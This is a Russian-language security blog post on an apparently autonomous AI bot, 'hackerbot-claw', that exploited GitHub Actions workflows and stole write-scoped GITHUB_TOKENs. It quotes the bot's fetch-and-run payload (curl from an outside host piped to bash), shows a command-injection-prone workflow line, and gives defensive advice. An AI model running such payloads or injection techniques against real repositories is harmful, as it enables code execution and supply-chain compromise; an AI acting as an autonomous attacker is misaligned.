← Назад к блогу
Облако и DevOps 5 мин

AI-бот "hackerbot-claw" эксплуатирует GitHub Actions: что известно о кампании автоматизированных атак

AI-бот hackerbot-claw массово атакует GitHub Actions. Узнайте о кампании автоматизированных эксплойтов и защитите свои репозитории от угроз безопасности.

AI-бот "hackerbot-claw" эксплуатирует GitHub Actions: что известно о кампании автоматизированных атак

Расцвет автоматизированной эксплуатации GitHub Actions

С 21 по 28 февраля 2026 года исследователи безопасности обнаружили AI-бота, систематически эксплуатирующего рабочие процессы GitHub Actions. Бот, работающий под именем "hackerbot-claw", продемонстрировал тревожную эволюцию в сложности атак: полностью автоматизированное сканирование уязвимостей, разработка эксплойтов и развертывание полезных нагрузок в нескольких высокопрофильных репозиториях.

Согласно анализу StepSecurity, бот сделал форк 5 репозиториев и открыл 12 pull request'ов в 4 целевых проектах в течение одной недели. По крайней мере 4 из этих попыток привели к успешному выполнению произвольного кода.

Как работает hackerbot-claw

README файл бота раскрыл его основную архитектуру: индекс паттернов уязвимостей, содержащий 9 классов и 47 подпаттернов. Это не просто очередной инструмент скрипт-кидди — это сложная система, которая автономно:

Реальные цифры: Журнал активности бота показал 5 успешных сессий эксплуатации всего за 2 дня до того, как исследователи его проанализировали.

Каждая атака доставляла идентичную полезную нагрузку: curl -sSfL hackmoltrepeat.com/molt | bash. Но вот что делает её изощренной — бот использовал разные техники эксплуатации для каждой цели, адаптируя свой подход на основе конкретной конфигурации workflow репозитория.

Анатомия успешной атаки

Одна задокументированная попытка эксплуатации продемонстрировала настойчивость бота. Против одной цели hackerbot-claw итерировал 6 раз в течение 18 часов. Первые четыре попытки провалились, так как меры безопасности цели их заблокировали.

Ключевой вывод для бизнеса: Попытки 5 и 6 (pull request'ы #6068 и #6069) увенчались успехом. Шаг workflow "Run quality checks", который обычно занимает 30 секунд, работал 5 минут и 37 секунд — явный признак вредоносной активности, выполняющейся в фоновом режиме.

Атака успешно эксфильтрировала GITHUB_TOKEN с правами записи к областям contents и pull-requests. С этими разрешениями атакующий может:

Техническая инновация: адаптация на основе AI

Что отличает hackerbot-claw от традиционных автоматизированных атак — это использование AI для кастомизации эксплойтов. Бот не распыляет слепо один и тот же эксплойт по тысячам репозиториев. Вместо этого он анализирует конфигурацию workflow каждой цели и выбирает из своей библиотеки паттернов.

Как задокументировано в исследовании Aikido Security об AI-интегрированных уязвимостях CI/CD, интеграция AI в рабочие процессы разработки создает новые поверхности атак. Когда workflow'ы GitHub Actions обрабатывают недоверенный контент из issue, pull request'ов или коммитов, они часто встраивают этот контент напрямую в промпты, отправляемые AI-моделям.

Проще говоря: Бот эксплуатирует доверительные отношения между CI/CD системами и кодом, который они собирают. Внедряя вредоносный контент в места, где workflow'ы его не ожидают, бот обманывает систему, заставляя её выполнить свою полезную нагрузку.

Почему эта атака успешна

Исследование уязвимостей Cycode идентифицировало основной паттерн уязвимости: workflow'ы, которые используют выражения типа ${{github.event.issue.title}} или ${{github.event.pull_request.title}} без должной санитизации, создают возможности для инъекции команд.

Уязвимый паттерн выглядит безобидно:

echo "Processing PR: ${{github.event.pull_request.title}}"

Но атакующий может создать заголовок pull request'а, содержащий метасимволы оболочки, чтобы выйти из команды echo и выполнить произвольный код.

Честное мнение: Большинство разработчиков считают, что выражения GitHub Actions безопасны, потому что они приходят из API GitHub. Это предположение неверно, когда данные происходят из контролируемых пользователем источников, таких как заголовки issue или описания PR.

Стратегии защиты, которые действительно работают

Основываясь на нашем опыте защиты CI/CD пайплайнов в десятках проектов, вот что мы рекомендуем:

1. Минимизируйте разрешения токенов

Никогда не используйте дефолтное permissions: write-all. Вместо этого явно объявляйте минимальные разрешения:

permissions:
  contents: read
  pull-requests: read

2. Санитизируйте весь пользовательский ввод

Любой workflow, который обрабатывает контролируемый пользователем контент, должен сначала его санитизировать. Используйте встроенные функции GitHub или промежуточные шаги для очистки данных перед использованием.

3. Мониторьте время выполнения workflow

Настройте алерты для workflow'ов, которые работают значительно дольше их базового времени. Задача, занимающая 30 секунд и внезапно работающая 5 минут, указывает на потенциальную эксплуатацию.

4. Правильно реализуйте паттерн Pull Request Target

Многие репозитории используют pull_request_target для доступа к секретам в PR workflow'ах. Это опасно при комбинации с checkout'ом недоверенного кода. Всегда проверяйте источник перед предоставлением повышенных разрешений.

Что это значит для вашего проекта

Появление AI-ботов для эксплуатации представляет смену парадигмы в безопасности CI/CD. Традиционные меры безопасности, которые полагаются на статические правила или сопоставление паттернов, не могут адаптироваться к атакующему, который учится и развивает свои техники.

Реальные цифры: С 47 подпаттернами в своем арсенале и способностью итерировать несколько раз на цель, hackerbot-claw может потенциально тестировать сотни вариаций эксплуатации против одного репозитория.

Организациям нужно переосмыслить свою стратегию безопасности CI/CD. Дни workflow'ов GitHub Actions по принципу "настроил и забыл" закончились. Каждый workflow, который обрабатывает внешний ввод, нуждается в проверке безопасности, и каждое использование повышенных разрешений требует обоснования.

Общая картина

Кампания hackerbot-claw демонстрирует, что атаки на цепочку поставок эволюционируют от ручных, целевых операций к автоматизированным, управляемым AI кампаниям. Способность бота достичь выполнения кода в нескольких высокопрофильных репозиториях менее чем за неделю показывает масштаб угрозы.

Вот что мы рекомендуем для немедленных действий:

  1. Проаудируйте все workflow'ы, использующие pull_request_target или обрабатывающие контент issue/PR
  2. Реализуйте строгие правила защиты веток, требующие одобрения для изменений workflow
  3. Используйте инструменты типа StepSecurity или собственные функции безопасности GitHub для мониторинга поведения workflow
  4. Обучите разработчиков безопасным паттернам GitHub Actions — синтаксис может выглядеть безопасным, но контекст выполнения имеет значение

Ключевой вывод для бизнеса: Стоимость скомпрометированного CI/CD пайплайна выходит далеко за рамки непосредственного взлома. Атакующие с правом записи в ваш репозиторий могут внедрить бэкдоры в вашу цепочку поставок ПО, затрагивая каждого клиента, который скачивает ваш код. Инвестиции в безопасность CI/CD окупаются предотвращением одной успешной атаки.

Статья подготовлена на основе открытых источников и может содержать неточности.

Читайте также

ВыжимкаAI
  1. AI-бот hackerbot-claw автоматизирует полный цикл атак на GitHub Actions: от сканирования уязвимостей до разработки эксплойтов и экспфильтрации токенов доступа, успешно компрометируя критические репозитории.
  2. Бот адаптивно подбирает техники эксплуатации под конкретную конфигурацию каждого репозитория, используя базу из 47 подпаттернов уязвимостей, что значительно повышает вероятность успеха по сравнению с массовыми слепыми атаками.
  3. Успешное получение GITHUB_TOKEN с правами записи позволяет атакующему не только пушить вредоносный код, но и мержить pull request'ы, модифицировать релизы и получать доступ к приватным данным, что делает такие компрометации критически опасными.
  4. Защита должна сосредоточиться на строгом ограничении разрешений GITHUB_TOKEN, мониторинге аномальной длительности workflow'ов и валидации pull request'ов от неофициальных соавторов, так как сама технология GitHub Actions по умолчанию обеспечивает мощный вектор атаки.

Powered by B1KEY